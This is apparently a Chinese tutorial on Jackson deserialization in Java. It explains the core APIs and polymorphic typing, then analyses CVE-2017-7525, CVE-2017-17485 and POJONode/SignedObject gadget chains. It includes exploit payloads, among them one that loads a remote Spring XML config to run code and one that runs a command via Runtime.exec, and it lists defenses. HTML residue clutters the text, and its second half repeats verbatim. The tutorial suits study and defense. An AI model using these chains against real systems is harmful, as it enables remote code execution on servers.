Jackson反序列化深度解析与安全实践<\/h1>

一、Jackson框架概述<\/h2>

1.1 基本介绍<\/h3>

Jackson是当前广泛使用的Java开源JSON处理框架，具有以下核心特点：<\/p>

Spring MVC默认JSON解析器<\/li>
高性能：解析大文件速度快，内存占用低<\/li>
模块化设计：核心由三个组件构成<\/li>

灵活API：易于扩展和定制<\/li> <\/ul>

1.2 核心组件<\/h3>

jackson-core<\/strong>：提供基于"流模式"解析的API<\/p>

JsonParser：解析JSON<\/li>
JsonGenerator：生成JSON<\/li> <\/ul> <\/li>

jackson-annotations<\/strong>：提供标准注解功能<\/p> <\/li>

jackson-databind<\/strong>：提供高级API<\/p>

ObjectMapper：对象绑定解析<\/li>
JsonNode：树模型解析<\/li> <\/ul> <\/li> <\/ol>
1.3 Maven依赖<\/h3>
<dependencies><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>com.fasterxml.jackson.core<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>jackson-databind<\/artifactId><\/span> <\/span><\/span> <version><\/span>2.9.3<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>com.fasterxml.jackson.core<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>jackson-core<\/artifactId><\/span> <\/span><\/span> <version><\/span>2.9.3<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>com.fasterxml.jackson.core<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>jackson-annotations<\/artifactId><\/span> <\/span><\/span> <version><\/span>2.9.3<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span><\/dependencies><\/span> <\/span><\/span><\/code><\/pre>二、核心API详解<\/h2> 2.1 ObjectMapper使用<\/h3> 2.1.1 JSON转对象<\/h4> String json =<\/span> "{\"name\":\"John\", \"age\":30}"<\/span>;<\/span> <\/span><\/span>ObjectMapper objectMapper =<\/span> new<\/span> ObjectMapper();<\/span> <\/span><\/span>Person person =<\/span> objectMapper.<\/span>readValue<\/span>(<\/span>json,<\/span> Person.<\/span>class<\/span>);<\/span> <\/span><\/span><\/code><\/pre>2.1.2 对象转JSON<\/h4> Person person =<\/span> new<\/span> Person();<\/span> <\/span><\/span>person.<\/span>setAge<\/span>(<\/span>123<\/span>);<\/span> <\/span><\/span>person.<\/span>setName<\/span>(<\/span>"fakes0u1"<\/span>);<\/span> <\/span><\/span> <\/span><\/span>String jsonString =<\/span> objectMapper.<\/span>writeValueAsString<\/span>(<\/span>person);<\/span> <\/span><\/span>\/\/ 或写入文件 <\/span><\/span><\/span><\/span>objectMapper.<\/span>writeValue<\/span>(<\/span>new<\/span> File(<\/span>"person.json"<\/span>),<\/span> person);<\/span> <\/span><\/span><\/code><\/pre>2.2 JsonParser底层解析<\/h3> String json =<\/span> "{\"name\":\"fakes0u1\",\"age\":123}"<\/span>;<\/span> <\/span><\/span>JsonFactory jsonFactory =<\/span> new<\/span> JsonFactory();<\/span> <\/span><\/span>JsonParser parser =<\/span> jsonFactory.<\/span>createParser<\/span>(<\/span>json);<\/span> <\/span><\/span> <\/span><\/span>while<\/span> (!<\/span>parser.<\/span>isClosed<\/span>())<\/span> {<\/span> <\/span><\/span> JsonToken jsonToken =<\/span> parser.<\/span>nextToken<\/span>();<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>jsonToken);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2.3 JsonGenerator生成JSON<\/h3> JsonFactory jsonFactory =<\/span> new<\/span> JsonFactory();<\/span> <\/span><\/span>JsonGenerator jsonGenerator =<\/span> jsonFactory.<\/span>createGenerator<\/span>(<\/span> <\/span><\/span> new<\/span> File(<\/span>"output.json"<\/span>),<\/span> JsonEncoding.<\/span>UTF8<\/span>);<\/span> <\/span><\/span> <\/span><\/span>jsonGenerator.<\/span>writeStartObject<\/span>();<\/span> <\/span><\/span>jsonGenerator.<\/span>writeStringField<\/span>(<\/span>"name"<\/span>,<\/span> "fakes0u1"<\/span>);<\/span> <\/span><\/span>jsonGenerator.<\/span>writeNumberField<\/span>(<\/span>"age"<\/span>,<\/span> 123<\/span>);<\/span> <\/span><\/span>jsonGenerator.<\/span>writeEndObject<\/span>();<\/span> <\/span><\/span>jsonGenerator.<\/span>close<\/span>();<\/span> <\/span><\/span><\/code><\/pre>三、多态处理机制<\/h2> 3.1 DefaultTyping机制<\/h3> 3.1.1 四种类型<\/h4> 类型<\/th> 描述<\/th> <\/tr> <\/thead> JAVA_LANG_OBJECT<\/td> 当属性为Object类型时处理<\/td> <\/tr> OBJECT_AND_NON_CONCRETE<\/td> 处理Object、Interface、AbstractClass（默认）<\/td> <\/tr> NON_CONCRETE_AND_ARRAYS<\/td> 处理Object、Interface、AbstractClass、Array<\/td> <\/tr> NON_FINAL<\/td> 处理所有非final属性<\/td> <\/tr> <\/tbody> <\/table> 3.1.2 使用示例<\/h4> ObjectMapper objectMapper =<\/span> new<\/span> ObjectMapper();<\/span> <\/span><\/span>objectMapper.<\/span>enableDefaultTyping<\/span>(<\/span>ObjectMapper.<\/span>DefaultTyping<\/span>.<\/span>OBJECT_AND_NON_CONCRETE<\/span>);<\/span> <\/span><\/span><\/code><\/pre>3.2 @JsonTypeInfo注解<\/h3> 3.2.1 五种类型<\/h4> @JsonTypeInfo<\/span>(<\/span>use =<\/span> JsonTypeInfo.<\/span>Id<\/span>.<\/span>NONE<\/span>)<\/span> \/\/ 不使用识别码 <\/span><\/span><\/span><\/span>@JsonTypeInfo<\/span>(<\/span>use =<\/span> JsonTypeInfo.<\/span>Id<\/span>.<\/span>CLASS<\/span>)<\/span> \/\/ 完全限定类名 <\/span><\/span><\/span><\/span>@JsonTypeInfo<\/span>(<\/span>use =<\/span> JsonTypeInfo.<\/span>Id<\/span>.<\/span>MINIMAL_CLASS<\/span>)<\/span> \/\/ 最小化类名 <\/span><\/span><\/span><\/span>@JsonTypeInfo<\/span>(<\/span>use =<\/span> JsonTypeInfo.<\/span>Id<\/span>.<\/span>NAME<\/span>)<\/span> \/\/ 使用指定名称 <\/span><\/span><\/span><\/span>@JsonTypeInfo<\/span>(<\/span>use =<\/span> JsonTypeInfo.<\/span>Id<\/span>.<\/span>CUSTOM<\/span>)<\/span> \/\/ 自定义 <\/span><\/span><\/span><\/code><\/pre>3.2.2 示例对比<\/h4> \/\/ 使用CLASS <\/span><\/span><\/span><\/span>{<\/span>"@class"<\/span>:<\/span>"jackson.Hacker"<\/span>,<\/span>"skill"<\/span>:<\/span>"moyu"<\/span>}<\/span> <\/span><\/span> <\/span><\/span>\/\/ 使用MINIMAL_CLASS <\/span><\/span><\/span><\/span>{<\/span>"@c"<\/span>:<\/span>"jackson.Hacker"<\/span>,<\/span>"skill"<\/span>:<\/span>"moyu"<\/span>}<\/span> <\/span><\/span> <\/span><\/span>\/\/ 使用NAME <\/span><\/span><\/span><\/span>{<\/span>"@type"<\/span>:<\/span>"Hacker"<\/span>,<\/span>"skill"<\/span>:<\/span>"moyu"<\/span>}<\/span> <\/span><\/span><\/code><\/pre>四、反序列化漏洞原理<\/h2> 4.1 漏洞触发条件<\/h3> 满足以下任一条件即可触发：<\/p> 调用了ObjectMapper.enableDefaultTyping()<\/code><\/li> 使用@JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)<\/code><\/li> 使用@JsonTypeInfo(use = JsonTypeInfo.Id.MINIMAL_CLASS)<\/code><\/li> <\/ol> 4.2 攻击面分析<\/h3> 4.2.1 无Object属性<\/h4> 依赖目标类中：<\/p> 构造方法存在危险代码<\/li> setter方法存在危险代码<\/li> <\/ul> 4.2.2 有Object属性<\/h4> 可利用服务端存在的任何满足条件的类：<\/p> 构造函数或setter方法存在漏洞<\/li> 类在classpath中可访问<\/li> <\/ul> 4.3 反序列化流程<\/h3> 实例化阶段<\/strong>：通过无参构造函数创建对象<\/li> 属性赋值阶段<\/strong>：通过setter方法或直接字段赋值<\/li> <\/ol> 五、典型漏洞分析<\/h2> 5.1 CVE-2017-7525（TemplatesImpl链）<\/h3> 5.1.1 影响版本<\/h4> Jackson 2.6系列 < 2.6.7.1<\/li> Jackson 2.7系列 < 2.7.9.1<\/li> Jackson 2.8系列 < 2.8.8.1<\/li> JDK 1.7<\/li> <\/ul> 5.1.2 利用关键点<\/h4> { <\/span><\/span> "object"<\/span>: [ <\/span><\/span> "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"<\/span>, <\/span><\/span> { <\/span><\/span> "transletBytecodes"<\/span>: ["base64编码的恶意类字节码"<\/span>], <\/span><\/span> "transletName"<\/span>: "fakes0u1"<\/span>, <\/span><\/span> "outputProperties"<\/span>: {} <\/span><\/span> } <\/span><\/span> ] <\/span><\/span>} <\/span><\/span><\/code><\/pre>5.1.3 高版本限制<\/h4> JDK高版本中因_factory<\/code>属性为null导致异常<\/p> 5.2 CVE-2017-17485（ClassPathXmlApplicationContext链）<\/h3> 5.2.1 影响版本<\/h4> Jackson 2.7系列 < 2.7.9.2<\/li> Jackson 2.8系列 < 2.8.11<\/li> Jackson 2.9系列 < 2.9.4<\/li> <\/ul> 5.2.2 利用方式<\/h4> String payload =<\/span> "[\"org.springframework.context.support.ClassPathXmlApplicationContext\", \"http:\/\/127.0.0.1\/spel.xml\"]"<\/span>;<\/span> <\/span><\/span>ObjectMapper mapper =<\/span> new<\/span> ObjectMapper();<\/span> <\/span><\/span>mapper.<\/span>enableDefaultTyping<\/span>();<\/span> <\/span><\/span>mapper.<\/span>readValue<\/span>(<\/span>payload,<\/span> Object.<\/span>class<\/span>);<\/span> <\/span><\/span><\/code><\/pre>5.2.3 补丁分析<\/h4> 新增校验：<\/p> 类名黑名单过滤<\/li> 检查是否以org.springframe<\/code>开头<\/li> 检查父类是否为AbstractPointcutAdvisor<\/code>或AbstractApplicationContext<\/code><\/li> <\/ol> 六、高级利用技术<\/h2> 6.1 PojoNode通杀利用<\/h3> 6.1.1 利用条件<\/h4> 不需要存在该属性<\/li> getter方法有返回值<\/li> 最好只有一个getter方法<\/li> <\/ol> 6.1.2 示例代码<\/h4> public<\/span> class<\/span> Evil<\/span> {<\/span> <\/span><\/span> public<\/span> Object getCmd<\/span>()<\/span> {<\/span> <\/span><\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span> <\/span><\/span> return<\/span> "exploited"<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>POJONode jsonNodes =<\/span> new<\/span> POJONode(<\/span>new<\/span> Evil());<\/span> <\/span><\/span>jsonNodes.<\/span>toString<\/span>();<\/span> \/\/ 触发getCmd() <\/span><\/span><\/span><\/code><\/pre>6.2 二次反序列化（SignObject链）<\/h3> 6.2.1 利用链构造<\/h4> \/\/ 1. 创建恶意TemplatesImpl <\/span><\/span><\/span><\/span>TemplatesImpl templatesImpl =<\/span> ...;<\/span> <\/span><\/span> <\/span><\/span>\/\/ 2. 包装为POJONode <\/span><\/span><\/span><\/span>POJONode jsonNodes2 =<\/span> new<\/span> POJONode(<\/span>templatesImpl);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 3. 创建BadAttributeValueExpException <\/span><\/span><\/span><\/span>BadAttributeValueExpException exp2 =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span> <\/span><\/span>Field val2 =<\/span> BadAttributeValueExpException.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"val"<\/span>);<\/span> <\/span><\/span>val2.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>val2.<\/span>set<\/span>(<\/span>exp2,<\/span> jsonNodes2);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 4. 创建SignedObject包装 <\/span><\/span><\/span><\/span>SignedObject signedObject =<\/span> new<\/span> SignedObject(<\/span>exp2,<\/span> privateKey,<\/span> signingEngine);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 5. 再次包装为POJONode <\/span><\/span><\/span><\/span>POJONode jsonNodes =<\/span> new<\/span> POJONode(<\/span>signedObject);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 6. 最终异常对象 <\/span><\/span><\/span><\/span>BadAttributeValueExpException exp =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span> <\/span><\/span>Field val =<\/span> BadAttributeValueExpException.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"val"<\/span>);<\/span> <\/span><\/span>val.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>val.<\/span>set<\/span>(<\/span>exp,<\/span> jsonNodes);<\/span> <\/span><\/span><\/code><\/pre>6.2.2 触发流程<\/h4> BadAttributeValueExpException.toString()<\/code><\/li> POJONode.toString()<\/code><\/li> SignedObject.getObject()<\/code>触发二次反序列化<\/li> 最终执行TemplatesImpl.getOutputProperties()<\/code><\/li> <\/ol> 七、防御措施<\/h2> 升级Jackson版本<\/strong>：使用已修复漏洞的最新版本<\/li> 禁用DefaultTyping<\/strong>：避免使用enableDefaultTyping()<\/code><\/li> 使用安全注解<\/strong>：谨慎使用@JsonTypeInfo<\/code>注解<\/li> 输入过滤<\/strong>：对反序列化的JSON数据进行严格校验<\/li> 类白名单<\/strong>：实现自定义的反序列化类检查机制<\/li> <\/ol> 八、调试技巧<\/h2> 关键断点<\/strong>：<\/p> BeanDeserializer.deserialize()<\/code><\/li> deserializeAndSet()<\/code><\/li> createUsingDefault()<\/code>（构造函数调用）<\/li> <\/ul> <\/li> 调用栈分析<\/strong>：<\/p> 关注JsonParser<\/code>的令牌处理流程<\/li> 跟踪多态类型的解析过程<\/li> 监控危险方法的调用链<\/li> <\/ul> <\/li> <\/ol> 九、总结<\/h2> Jackson反序列化漏洞的核心在于多态类型处理机制被滥用。理解DefaultTyping<\/code>和@JsonTypeInfo<\/code>的工作原理是分析这类漏洞的基础，而掌握各种利用链的构造方式则是实战中的关键。防御方面应重点关注类型处理的严格控制和输入验证。<\/p>

类型<\/th>	描述<\/th> <\/tr> <\/thead>
JAVA_LANG_OBJECT<\/td>	当属性为Object类型时处理<\/td> <\/tr>
OBJECT_AND_NON_CONCRETE<\/td>	处理Object、Interface、AbstractClass（默认）<\/td> <\/tr>
NON_CONCRETE_AND_ARRAYS<\/td>	处理Object、Interface、AbstractClass、Array<\/td> <\/tr>
NON_FINAL<\/td>	处理所有非final属性<\/td> <\/tr> <\/tbody> <\/table> 3.1.2 使用示例<\/h4> ObjectMapper objectMapper =<\/span> new<\/span> ObjectMapper();<\/span> <\/span><\/span>objectMapper.<\/span>enableDefaultTyping<\/span>(<\/span>ObjectMapper.<\/span>DefaultTyping<\/span>.<\/span>OBJECT_AND_NON_CONCRETE<\/span>);<\/span> <\/span><\/span><\/code><\/pre>3.2 @JsonTypeInfo注解<\/h3> 3.2.1 五种类型<\/h4> @JsonTypeInfo<\/span>(<\/span>use =<\/span> JsonTypeInfo.<\/span>Id<\/span>.<\/span>NONE<\/span>)<\/span> \/\/ 不使用识别码 <\/span><\/span><\/span><\/span>@JsonTypeInfo<\/span>(<\/span>use =<\/span> JsonTypeInfo.<\/span>Id<\/span>.<\/span>CLASS<\/span>)<\/span> \/\/ 完全限定类名 <\/span><\/span><\/span><\/span>@JsonTypeInfo<\/span>(<\/span>use =<\/span> JsonTypeInfo.<\/span>Id<\/span>.<\/span>MINIMAL_CLASS<\/span>)<\/span> \/\/ 最小化类名 <\/span><\/span><\/span><\/span>@JsonTypeInfo<\/span>(<\/span>use =<\/span> JsonTypeInfo.<\/span>Id<\/span>.<\/span>NAME<\/span>)<\/span> \/\/ 使用指定名称 <\/span><\/span><\/span><\/span>@JsonTypeInfo<\/span>(<\/span>use =<\/span> JsonTypeInfo.<\/span>Id<\/span>.<\/span>CUSTOM<\/span>)<\/span> \/\/ 自定义 <\/span><\/span><\/span><\/code><\/pre>3.2.2 示例对比<\/h4> \/\/ 使用CLASS <\/span><\/span><\/span><\/span>{<\/span>"@class"<\/span>:<\/span>"jackson.Hacker"<\/span>,<\/span>"skill"<\/span>:<\/span>"moyu"<\/span>}<\/span> <\/span><\/span> <\/span><\/span>\/\/ 使用MINIMAL_CLASS <\/span><\/span><\/span><\/span>{<\/span>"@c"<\/span>:<\/span>"jackson.Hacker"<\/span>,<\/span>"skill"<\/span>:<\/span>"moyu"<\/span>}<\/span> <\/span><\/span> <\/span><\/span>\/\/ 使用NAME <\/span><\/span><\/span><\/span>{<\/span>"@type"<\/span>:<\/span>"Hacker"<\/span>,<\/span>"skill"<\/span>:<\/span>"moyu"<\/span>}<\/span> <\/span><\/span><\/code><\/pre>四、反序列化漏洞原理<\/h2> 4.1 漏洞触发条件<\/h3> 满足以下任一条件即可触发：<\/p> 调用了ObjectMapper.enableDefaultTyping()<\/code><\/li> 使用@JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)<\/code><\/li> 使用@JsonTypeInfo(use = JsonTypeInfo.Id.MINIMAL_CLASS)<\/code><\/li> <\/ol> 4.2 攻击面分析<\/h3> 4.2.1 无Object属性<\/h4> 依赖目标类中：<\/p> 构造方法存在危险代码<\/li> setter方法存在危险代码<\/li> <\/ul> 4.2.2 有Object属性<\/h4> 可利用服务端存在的任何满足条件的类：<\/p> 构造函数或setter方法存在漏洞<\/li> 类在classpath中可访问<\/li> <\/ul> 4.3 反序列化流程<\/h3> 实例化阶段<\/strong>：通过无参构造函数创建对象<\/li> 属性赋值阶段<\/strong>：通过setter方法或直接字段赋值<\/li> <\/ol> 五、典型漏洞分析<\/h2> 5.1 CVE-2017-7525（TemplatesImpl链）<\/h3> 5.1.1 影响版本<\/h4> Jackson 2.6系列 < 2.6.7.1<\/li> Jackson 2.7系列 < 2.7.9.1<\/li> Jackson 2.8系列 < 2.8.8.1<\/li> JDK 1.7<\/li> <\/ul> 5.1.2 利用关键点<\/h4> { <\/span><\/span> "object"<\/span>: [ <\/span><\/span> "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"<\/span>, <\/span><\/span> { <\/span><\/span> "transletBytecodes"<\/span>: ["base64编码的恶意类字节码"<\/span>], <\/span><\/span> "transletName"<\/span>: "fakes0u1"<\/span>, <\/span><\/span> "outputProperties"<\/span>: {} <\/span><\/span> } <\/span><\/span> ] <\/span><\/span>} <\/span><\/span><\/code><\/pre>5.1.3 高版本限制<\/h4> JDK高版本中因_factory<\/code>属性为null导致异常<\/p> 5.2 CVE-2017-17485（ClassPathXmlApplicationContext链）<\/h3> 5.2.1 影响版本<\/h4> Jackson 2.7系列 < 2.7.9.2<\/li> Jackson 2.8系列 < 2.8.11<\/li> Jackson 2.9系列 < 2.9.4<\/li> <\/ul> 5.2.2 利用方式<\/h4> String payload =<\/span> "[\"org.springframework.context.support.ClassPathXmlApplicationContext\", \"http:\/\/127.0.0.1\/spel.xml\"]"<\/span>;<\/span> <\/span><\/span>ObjectMapper mapper =<\/span> new<\/span> ObjectMapper();<\/span> <\/span><\/span>mapper.<\/span>enableDefaultTyping<\/span>();<\/span> <\/span><\/span>mapper.<\/span>readValue<\/span>(<\/span>payload,<\/span> Object.<\/span>class<\/span>);<\/span> <\/span><\/span><\/code><\/pre>5.2.3 补丁分析<\/h4> 新增校验：<\/p> 类名黑名单过滤<\/li> 检查是否以org.springframe<\/code>开头<\/li> 检查父类是否为AbstractPointcutAdvisor<\/code>或AbstractApplicationContext<\/code><\/li> <\/ol> 六、高级利用技术<\/h2> 6.1 PojoNode通杀利用<\/h3> 6.1.1 利用条件<\/h4> 不需要存在该属性<\/li> getter方法有返回值<\/li> 最好只有一个getter方法<\/li> <\/ol> 6.1.2 示例代码<\/h4> public<\/span> class<\/span> Evil<\/span> {<\/span> <\/span><\/span> public<\/span> Object getCmd<\/span>()<\/span> {<\/span> <\/span><\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span> <\/span><\/span> return<\/span> "exploited"<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>POJONode jsonNodes =<\/span> new<\/span> POJONode(<\/span>new<\/span> Evil());<\/span> <\/span><\/span>jsonNodes.<\/span>toString<\/span>();<\/span> \/\/ 触发getCmd() <\/span><\/span><\/span><\/code><\/pre>6.2 二次反序列化（SignObject链）<\/h3> 6.2.1 利用链构造<\/h4> \/\/ 1. 创建恶意TemplatesImpl <\/span><\/span><\/span><\/span>TemplatesImpl templatesImpl =<\/span> ...;<\/span> <\/span><\/span> <\/span><\/span>\/\/ 2. 包装为POJONode <\/span><\/span><\/span><\/span>POJONode jsonNodes2 =<\/span> new<\/span> POJONode(<\/span>templatesImpl);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 3. 创建BadAttributeValueExpException <\/span><\/span><\/span><\/span>BadAttributeValueExpException exp2 =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span> <\/span><\/span>Field val2 =<\/span> BadAttributeValueExpException.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"val"<\/span>);<\/span> <\/span><\/span>val2.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>val2.<\/span>set<\/span>(<\/span>exp2,<\/span> jsonNodes2);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 4. 创建SignedObject包装 <\/span><\/span><\/span><\/span>SignedObject signedObject =<\/span> new<\/span> SignedObject(<\/span>exp2,<\/span> privateKey,<\/span> signingEngine);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 5. 再次包装为POJONode <\/span><\/span><\/span><\/span>POJONode jsonNodes =<\/span> new<\/span> POJONode(<\/span>signedObject);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 6. 最终异常对象 <\/span><\/span><\/span><\/span>BadAttributeValueExpException exp =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span> <\/span><\/span>Field val =<\/span> BadAttributeValueExpException.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"val"<\/span>);<\/span> <\/span><\/span>val.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>val.<\/span>set<\/span>(<\/span>exp,<\/span> jsonNodes);<\/span> <\/span><\/span><\/code><\/pre>6.2.2 触发流程<\/h4> BadAttributeValueExpException.toString()<\/code><\/li> POJONode.toString()<\/code><\/li> SignedObject.getObject()<\/code>触发二次反序列化<\/li> 最终执行TemplatesImpl.getOutputProperties()<\/code><\/li> <\/ol> 七、防御措施<\/h2> 升级Jackson版本<\/strong>：使用已修复漏洞的最新版本<\/li> 禁用DefaultTyping<\/strong>：避免使用enableDefaultTyping()<\/code><\/li> 使用安全注解<\/strong>：谨慎使用@JsonTypeInfo<\/code>注解<\/li> 输入过滤<\/strong>：对反序列化的JSON数据进行严格校验<\/li> 类白名单<\/strong>：实现自定义的反序列化类检查机制<\/li> <\/ol> 八、调试技巧<\/h2> 关键断点<\/strong>：<\/p> BeanDeserializer.deserialize()<\/code><\/li> deserializeAndSet()<\/code><\/li> createUsingDefault()<\/code>（构造函数调用）<\/li> <\/ul> <\/li> 调用栈分析<\/strong>：<\/p> 关注JsonParser<\/code>的令牌处理流程<\/li> 跟踪多态类型的解析过程<\/li> 监控危险方法的调用链<\/li> <\/ul> <\/li> <\/ol> 九、总结<\/h2> Jackson反序列化漏洞的核心在于多态类型处理机制被滥用。理解DefaultTyping<\/code>和@JsonTypeInfo<\/code>的工作原理是分析这类漏洞的基础，而掌握各种利用链的构造方式则是实战中的关键。防御方面应重点关注类型处理的严格控制和输入验证。<\/p>